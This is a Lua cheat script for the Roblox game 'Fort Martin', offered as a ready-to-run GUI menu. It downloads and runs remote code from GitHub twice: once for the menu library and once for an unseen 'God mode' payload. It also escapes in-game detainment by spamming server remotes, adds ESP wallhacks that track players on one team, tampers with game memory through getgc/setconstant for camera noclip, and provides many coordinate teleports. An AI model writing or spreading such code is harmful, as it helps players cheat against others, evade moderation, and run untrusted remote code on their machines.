local script12321 = "ADMIN"
local game12321 = "Game: Fort Martin"


local Mercury = loadstring(game:HttpGet("https://raw.githubusercontent.com/UD92IlIllllII421248535IlIIIIIIIlllIlIIl/Yeah/main/.gitignore"))()
local GUI = Mercury:Create{
    Name = "Mercury",
    Size = UDim2.fromOffset(615, 400),
    Theme = Mercury.Themes.Dark,
    Link = "http://discord.gg/wUbAAhypTH"
}

local Tab = GUI:Tab{
	Name = "Miscellaneous",
	Icon = "rbxassetid://6157200594"
}

Tab:Button{
	Name = "MPC undetain TP",
	Description = "This is used when MPC is spawn camping. Note: Risk of getting kicked/banned.",
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Reseting and tping...",
	Duration = 8,
	Callback = function() end
}
GUI:Notification{
	Title = "Alert",
	Text = "Detain time before able to leave game:",
	Duration = 125,
	Callback = function() end
}
local args = {
    [1] = 1
}

game:GetService("ReplicatedStorage").Packages.Knit.Services.SkydivingService.RF.FallDamage:InvokeServer(unpack(args))

game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.RequestDeploy:InvokeServer()

wait(0.2)
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-215.136826, 10.2285948, 1628.71802, 0.475295752, -5.86179716e-10, -0.879826069, -8.12481638e-10, 1, -1.10516019e-09, 0.879826069, 1.24012045e-09, 0.475295752)

while wait() do
    game:GetService("ReplicatedStorage").Packages.Knit.Services.PrisonService.RF.DetainReleaseCheck:InvokeServer()
end
end}

Tab:Button{
	Name = "MPC undetain",
	Description = "Removes MPC detainment.",
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

GUI:Notification{
	Title = "Alert",
	Text = "Detain time before able to leave game:",
	Duration = 125,
	Callback = function() end
}
local args = {
    [1] = 1
}

game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Reset:InvokeServer()
wait(1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.RequestDeploy:InvokeServer()

wait(0.3)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(0.1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(0.1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
wait(1)
game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.Respawn:InvokeServer()
while wait() do
    game:GetService("ReplicatedStorage").Packages.Knit.Services.PrisonService.RF.DetainReleaseCheck:InvokeServer()
end
end}

Tab:Toggle{
	Name = "MPC ESP",
	StartingState = false,
	Description = "It will show the location of all military corps.",
	Callback = function(state)
	   getgenv().ESP2 = true
            getgenv().ESP2 = state
    -- Define the ESP update interval (in seconds)
    local ESP2_UPDATE_INTERVAL = 2
    
    -- Create a function to update the ESP
    
    local function updateESP2()
        -- Loop through all players in the game
        for _, player in pairs(game:GetService("Players"):GetChildren()) do
            -- Check if the player is on the MPC team
            if player.Team and player.Team.Name == "MPC" then
                -- Check if the player already has an ESP billboard
                local existingBillboardGui = player.Character and player.Character:FindFirstChild("ESP2")
                if not existingBillboardGui then
                    -- Create a new billboard gui for the player
                    local billboardGui = Instance.new("BillboardGui")
                    billboardGui.Name = "ESP2"
                    billboardGui.Size = UDim2.new(0, 100, 0, 100)
                    billboardGui.AlwaysOnTop = true
                    billboardGui.LightInfluence = 0
                    billboardGui.MaxDistance = math.huge
                    billboardGui.Parent = player.Character or player.CharacterAdded:Wait()
    
                    -- Create a text label for the player's username and distance
                    local nameLabel = Instance.new("TextLabel")
                    nameLabel.Name = "NameLabel"
                    nameLabel.Parent = billboardGui
                    nameLabel.Size = UDim2.new(1, 0, 0.5, 0)
                    nameLabel.Position = UDim2.new(0, 0, 0, 0)
                    nameLabel.BackgroundTransparency = 1
                    nameLabel.Text = player.Name .. " (" .. tostring(math.floor((player.Character and player.Character:FindFirstChild("HumanoidRootPart") and (player.Character.HumanoidRootPart.Position - game.Players.LocalPlayer.Character.HumanoidRootPart.Position).magnitude or 0) + 0.5)) .. " studs)"
                    nameLabel.TextColor3 = Color3.new(1, 1, 1)
                    nameLabel.FontSize = Enum.FontSize.Size18
                    nameLabel.Font = Enum.Font.SourceSansBold
                else
                    -- Update the existing ESP billboard
                    existingBillboardGui.Enabled = true
                    existingBillboardGui.NameLabel.Text = player.Name .. " (" .. tostring(math.floor((player.Character and player.Character:FindFirstChild("HumanoidRootPart") and (player.Character.HumanoidRootPart.Position - game.Players.LocalPlayer.Character.HumanoidRootPart.Position).magnitude or 0) + 0.5)) .. " studs)"
                end
            end
        end
    end
    
    -- Check if getgenv is set to true or false
    if getgenv().ESP2 == true then
        -- Create a loop to update the ESP every few seconds
    while true do
    if getgenv().ESP2 then
        updateESP2()
    end
    wait(ESP2_UPDATE_INTERVAL)
    end

    else
        -- Hide all existing ESP billboards
        for _, player in pairs(game:GetService("Players"):GetChildren()) do
            local existingBillboardGui = player.Character and player.Character:FindFirstChild("ESP2")
            if existingBillboardGui then
                existingBillboardGui.Enabled = false
            end
        end
    end
    
    local holder = game.CoreGui:FindFirstChild("ESP2Holder") or Instance.new("Folder")
    if ESP2 == false then
        holder:Destroy()
    end
    
    if holder.Name == "Folder" then
        holder.Name = "ESP2Holder"
        holder.Parent = game.CoreGui
    end
    
    if uselocalplayer == false and holder:FindFirstChild(game.Players.LocalPlayer.Name) then
        holder:FindFirstChild(game.Players.LocalPlayer.Name):Destroy()
    end
    
    if getgenv().ESP2 == true then 
        getgenv().ESP2 = false
        getgenv().ESP2 = true
    end
    
    while getgenv().ESP2 do
        task.wait()
        for _,v in pairs(game.Players:GetChildren()) do
            if v.Team ~= nil and v.Team.Name == "MPC" then -- Check if player is on the MPC team
                local chr = v.Character
                if chr ~= nil then
                    local ESP2 = holder:FindFirstChild(v.Name) or Instance.new("Highlight")
                    ESP2.Name = v.Name
                    if uselocalplayer == false and ESP2.Name == game.Players.LocalPlayer.Name then
                    else
                        ESP2.Parent = holder
                        if filluseteamcolor then
                            ESP2.FillColor = v.TeamColor.Color
                        else
                            ESP2.FillColor = fillcolor 
                        end
                        if outlineuseteamcolor then
                            ESP2.OutlineColor = v.TeamColor.Color
                        else
                            ESP2.OutlineColor = outlinecolor    
                        end
                        ESP2.FillTransparency = filltrans
                        ESP2.OutlineTransparency = outlinetrans
                        ESP2.Adornee = chr
                        ESP2.DepthMode = Enum.HighlightDepthMode.AlwaysOnTop
                    end
                end
            end
        end
    end
        getgenv().ESP2 = true == state
end}



Tab:Toggle{
	Name = "MPC HIGHLIGHT ESP",
	StartingState = false,
	Description = "Higlights all military corps. Note: This dose not work in at far distance.",
	Callback = function(state)
getgenv().ESP = true
getgenv().ESP = state
getgenv().uselocalplayer = false
getgenv().filluseteamcolor = true
getgenv().outlineuseteamcolor = false
getgenv().fillcolor = Color3.new(0, 0, 0)
getgenv().outlinecolor = Color3.new(1, 1, 1)
getgenv().filltrans = 0.5
getgenv().outlinetrans = 0

local holder = game.CoreGui:FindFirstChild("ESPHolder") or Instance.new("Folder")
if not getgenv().ESP then
    holder:Destroy()
else
    if holder.Name == "Folder" then
        holder.Name = "ESPHolder"
        holder.Parent = game.CoreGui
    end
    if not getgenv().uselocalplayer and holder:FindFirstChild(game.Players.LocalPlayer.Name) then
        holder:FindFirstChild(game.Players.LocalPlayer.Name):Destroy()
    end
end

game.Players.PlayerAdded:Connect(function(player)
    if player.Team ~= nil and player.Team.Name == "MPC" then
        local chr = player.Character
        if chr ~= nil then
            local esp = holder:FindFirstChild(player.Name) or Instance.new("Highlight")
            esp.Name = player.Name
            if not getgenv().uselocalplayer or esp.Name ~= game.Players.LocalPlayer.Name then
                esp.Parent = holder
                if getgenv().filluseteamcolor then
                    esp.FillColor = player.TeamColor.Color
                else
                    esp.FillColor = getgenv().fillcolor
                end
                if getgenv().outlineuseteamcolor then
                    esp.OutlineColor = player.TeamColor.Color
                else
                    esp.OutlineColor = getgenv().outlinecolor
                end
                esp.FillTransparency = getgenv().filltrans
                esp.OutlineTransparency = getgenv().outlinetrans
                esp.Adornee = chr
                esp.DepthMode = Enum.HighlightDepthMode.AlwaysOnTop
            end
        end
    end
end)

while true do
    if getgenv().ESP then
        for _,v in pairs(game.Players:GetChildren()) do
            if v.Team ~= nil and v.Team.Name == "MPC" then
                local chr = v.Character
                if chr ~= nil then
                    local esp = holder:FindFirstChild(v.Name) or Instance.new("Highlight")
                    esp.Name = v.Name
                    if not getgenv().uselocalplayer or esp.Name ~= game.Players.LocalPlayer.Name then
                        esp.Parent = holder
                        if getgenv().filluseteamcolor then
                            esp.FillColor = v.TeamColor.Color
                        else
                            esp.FillColor = getgenv().fillcolor
                        end
                        if getgenv().outlineuseteamcolor then
                            esp.OutlineColor = v.TeamColor.Color
                        else
                            esp.OutlineColor = getgenv().outlinecolor
                        end
                        esp.FillTransparency = getgenv().filltrans
                        esp.OutlineTransparency = getgenv().outlinetrans
                        esp.Adornee = chr
                        esp.DepthMode = Enum.HighlightDepthMode.AlwaysOnTop
                    end
                end
            end
        end
    else
        holder:ClearAllChildren()
    end
    task.wait()
end
getgenv().ESP = true == state
end}

Tab:Button{
	Name = "Cammra Noclip",
	Description = "Allows your cammra to go through the walls.",
	Callback = function()
for useless, garbage in next,getgc() do
   if getfenv(garbage).script == game.Players.LocalPlayer.PlayerScripts.PlayerModule.CameraModule.ZoomController.Popper and typeof(garbage) == "function" then
       for number, value in next, getconstants(garbage) do
           if tonumber(value) == 0.25 then
               setconstant(garbage,number,0)
           elseif tonumber(value) == 0 then
               setconstant(garbage,number,0.25)
           end
       end
   end
end
end}

Tab:Button{
	Name = "Allow Reset",
	Description = "Allowing reset even during detained.",
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Reseting...",
	Duration = 8,
	Callback = function() end
}

while wait() do
    game:GetService("StarterGui"):SetCore("ResetButtonCallback",true)
end
while wait() do
    game:GetService("ReplicatedStorage").Packages.Knit.Services.PrisonService.RF.DetainReleaseCheck:InvokeServer()
end
end}

Tab:Button{
	Name = "God mode",
	Description = "God Mode gives you infinite health. Note: Risk of getting kicked/banned.",
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "God modded.",
	Duration = 8,
	Callback = function() end
}
loadstring(game:HttpGet("https://raw.githubusercontent.com/Ihaveash0rtnamefordiscord/Releases/main/FortMartinGodmode"))(' Watermelon ?')
end}

local Tab = GUI:Tab{
	Name = "TP places",
	Icon = "rbxassetid://7199724739"
}

Tab:Button{
	Name = "ASOC pavs/helipads/parachutes",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-273.986847, 9.68434334, 1178.64819, 0.00443687011, 9.06104791e-09, 0.999990165, 3.58640362e-09, 1, -9.07704933e-09, -0.999990165, 3.62664188e-09, 0.00443687011)
end}

Tab:Button{
	Name = "MPC HQ",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(86.9417114, 9.73274612, 600.078186, -0.00775325531, -5.18449683e-09, 0.999969959, 2.86729041e-08, 1, 5.40696776e-09, -0.999969959, 2.87139628e-08, -0.00775325531)
end}

Tab:Button{
	Name = "MPC Jail",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(86.9367905, -5.68009472, 582.540588, -0.999667168, -4.01923606e-10, -0.0257991701, -9.49855472e-11, 1, -1.18984325e-08, 0.0257991701, -1.18920216e-08, -0.999667168)
end}

Tab:Button{
	Name = "MPC helipads",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(88.2854691, 44.2849922, 544.887329, -0.999979973, 8.76001138e-08, 0.0063287681, 8.75278161e-08, 1, -1.17001431e-08, -0.0063287681, -1.1145965e-08, -0.999979973)
end}

Tab:Button{
	Name = "Main Pavs",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(183.76088, 9.68735409, 1341.93616, 0.999822497, -2.0820492e-08, -0.0188397747, 2.1129976e-08, 1, 1.62280891e-08, 0.0188397747, -1.6623293e-08, 0.999822497)
end}

Tab:Button{
	Name = "BCT spawn",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(956.411621, 10.3406439, 873.142639, -0.0111339716, 5.66165177e-08, 0.999938011, 6.61164705e-08, 1, -5.58838416e-08, -0.999938011, 6.54901626e-08, -0.0111339716)
end}

Tab:Button{
	Name = "BCT middle",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1064.91479, 10.3148546, 690.214233, -0.999999821, -7.53033369e-09, -0.000608675531, -7.56502061e-09, 1, 5.69855487e-08, 0.000608675531, 5.69901424e-08, -0.999999821)
end}

Tab:Button{
	Name = "BCT gates",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1088.23694, 9.55546761, 955.511597, 0.0375596099, -2.03822603e-09, 0.9992944, -8.33467517e-09, 1, 2.3529334e-09, -0.9992944, -8.41716918e-09, 0.0375596099)
end}

Tab:Button{
	Name = "BCT back entrence",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(843.585205, 10.3485556, 709.132996, 0.0233228076, -6.05396906e-08, -0.999727964, 1.46258134e-08, 1, -6.02149584e-08, 0.999727964, -1.32174529e-08, 0.0233228076)
end}

Tab:Button{
	Name = "BCT obstacle course",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1421.87317, 8.97494888, 873.78479, 0.999670088, 5.95610601e-08, -0.0256855972, -5.97199517e-08, 1, -5.41883916e-09, 0.0256855972, 6.950994e-09, 0.999670088)
end}

Tab:Button{
	Name = "BCT classroom 1",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1180.03333, 10.3466177, 936.081055, -0.999994457, -6.92155711e-09, 0.00333300605, -6.87468527e-09, 1, 1.4074363e-08, -0.00333300605, 1.40513716e-08, -0.999994457)
end}

Tab:Button{
	Name = "BCT classroom 2",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1342.48523, 10.2834044, 935.858765, -0.999765575, 2.99000291e-08, 0.0216503851, 2.96453528e-08, 1, -1.20840582e-08, -0.0216503851, -1.14393925e-08, -0.999765575)
end}

Tab:Button{
	Name = "TRADOC spawn/pavs",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1246.53699, 10.3407059, 1128.89722, -0.999932349, 6.6632964e-08, -0.0116297416, 6.74333478e-08, 1, -6.84302037e-08, 0.0116297416, -6.92098041e-08, -0.999932349)
end}

Tab:Button{
	Name = "Parachute area",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(40.17379, 9.70832157, 1597.62732, -0.0150018213, -2.08007425e-08, 0.999887466, 7.86143428e-10, 1, 2.08148787e-08, -0.999887466, 1.09831599e-09, -0.0150018213)
end}

Tab:Button{
	Name = "Civilian parachute area",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(137.333344, 10.1256552, 331.893829, 0.047056064, -6.16114733e-08, 0.998892248, 6.73898484e-08, 1, 5.85051829e-08, -0.998892248, 6.45621725e-08, 0.047056064)
end}

Tab:Button{
	Name = "Eagle-1, C-17",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(236.174637, 11004.0957, 1555.65173, -3.73517034e-14, -8.26883522e-08, -1, -6.44793374e-08, 1, -8.26883522e-08, 1, 6.44793374e-08, -4.26833929e-14)
end}

Tab:Button{
	Name = "Eagle-2, C-17",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1355.60498, 2129.24902, 2551.59106, 0.499959469, 9.77596315e-09, 0.866048813, 9.07904436e-08, 1, -6.37002273e-08, -0.866048813, 1.10476485e-07, 0.499959469)
end}

Tab:Button{
	Name = "Civilian plane",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-671.884277, 3331.55176, -1295.37415, 0.711412668, -3.79786513e-08, -0.702774525, 1.91926519e-09, 1, -5.20981622e-08, 0.702774525, 3.5714482e-08, 0.711412668)
end}

Tab:Button{
	Name = "Main lockers",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(333.739532, 10.6958399, 1260.73853, 0.00313517102, 5.78071457e-08, 0.999995112, 7.79117642e-08, 1, -5.80516968e-08, -0.999995112, 7.8093386e-08, 0.00313517102)
end}

Tab:Button{
	Name = "MIC spawn",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(590.387085, -13.2860994, 758.748291, 0.0130349547, -1.00658234e-07, 0.999915063, 1.63013887e-08, 1, 1.0045428e-07, -0.999915063, 1.49905865e-08, 0.0130349547)
end}

Tab:Button{
	Name = "Graduation pavs",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(944.054504, 9.64926529, 1150.47632, -0.999684632, 8.47997441e-08, 0.0251116548, 8.29876896e-08, 1, -7.32021661e-08, -0.0251116548, -7.10951227e-08, -0.999684632)
end}

Tab:Button{
	Name = "Food court",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(148.651016, 17.6053772, 1531.13232, -0.00769931078, -3.21330589e-08, 0.999970376, -2.77040666e-08, 1, 3.19207025e-08, -0.999970376, -2.74574763e-08, -0.00769931078)
end}

Tab:Button{
	Name = "HQ offices",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(566.007996, 9.80166626, 675.131958, -0.745923996, -1.14779326e-07, 0.666031063, -5.92766156e-08, 1, 1.05946221e-07, -0.666031063, 3.95477606e-08, -0.745923996)
end}

Tab:Button{
	Name = "HQ helipad",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(613.711548, 33.08741, 512.916138, -0.999864519, 7.24428375e-08, -0.0164586939, 7.14111508e-08, 1, 6.32709529e-08, 0.0164586939, 6.20870537e-08, -0.999864519)
end}

Tab:Button{
	Name = "Shooting range",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(833.100647, 12.9718513, 1583.71362, 0.0194671713, 2.37959275e-09, -0.999810517, 2.54575894e-09, 1, 2.42961185e-09, 0.999810517, -2.59257416e-09, 0.0194671713)
end}

Tab:Button{
	Name = "Obstacle course",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(339.775726, 8.9776516, 1602.72485, -0.0115794567, 6.29152765e-08, -0.999932945, 6.84197516e-08, 1, 6.21271781e-08, 0.999932945, -6.76957654e-08, -0.0115794567)
end}

Tab:Button{
	Name = "Top of tower",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(340.249603, 126.121132, 1755.71228, 0.704752564, 2.13159215e-08, -0.709453166, -1.60960862e-08, 1, 1.4056126e-08, 0.709453166, 1.51332757e-09, 0.704752564)
end}

Tab:Button{
	Name = "Gas station",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(100.288239, 9.55741215, 989.492249, 0.999849319, -2.01223731e-08, -0.0173591096, 2.01457784e-08, 1, 1.17339594e-09, 0.0173591096, -1.52293189e-09, 0.999849319)
end}

Tab:Button{
	Name = "Civilian spawn",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(259.106445, 9.53177071, -15.8817606, -0.999200523, 1.37413778e-08, 0.03997913, 8.84676155e-09, 1, -1.2260621e-07, -0.03997913, -1.22154503e-07, -0.999200523)
end}

Tab:Button{
	Name = "Raiders spawn",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(10.246089, 20.9324799, -491.017151, -0.893917918, -2.69051732e-08, 0.448230743, -2.60664272e-08, 1, 8.04034084e-09, -0.448230743, -4.49636905e-09, -0.893917918)
end}

Tab:Button{
	Name = "Civilian gate",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(257.801727, 9.91553211, 389.690826, 0.999987543, 2.52958241e-08, 0.00498700375, -2.54312535e-08, 1, 2.70930105e-08, -0.00498700375, -2.72194995e-08, 0.999987543)
end}

Tab:Button{
	Name = "Big guns",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-112.628395, 22.8749943, 1454.87988, -0.0158770904, -3.54068881e-08, 0.999873936, -6.8053132e-09, 1, 3.5303291e-08, -0.999873936, -6.24394181e-09, -0.0158770904)
end}

Tab:Button{
	Name = "Raiders roof  1",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(119.108536, 54.1831627, 1104.49707, 0.999776006, 1.20392443e-07, 0.0211659055, -1.21016427e-07, 1, 2.82000165e-08, -0.0211659055, -3.07551211e-08, 0.999776006)
end}

Tab:Button{
	Name = "Raiders roof  2",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(457.370544, 55.6469078, 1404.94775, -0.999874711, 6.28310133e-08, -0.0158282351, 6.38087556e-08, 1, -6.1267059e-08, 0.0158282351, -6.22693648e-08, -0.999874711)
end}

Tab:Button{
	Name = "Classroom 1",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(159.82637, 9.69855595, 1347.69263, -0.999993682, -3.95783495e-09, -0.00355645362, -3.73066689e-09, 1, -6.3881572e-08, 0.00355645362, -6.38678941e-08, -0.999993682)
end}

Tab:Button{
	Name = "Classroom 2",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(21.1990376, 9.66398239, 1346.92493, -0.999998927, 1.20805126e-08, -0.00148125459, 1.20628414e-08, 1, 1.19388028e-08, 0.00148125459, 1.19209211e-08, -0.999998927)
end}

Tab:Button{
	Name = "Undergrown tunnel civlian",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
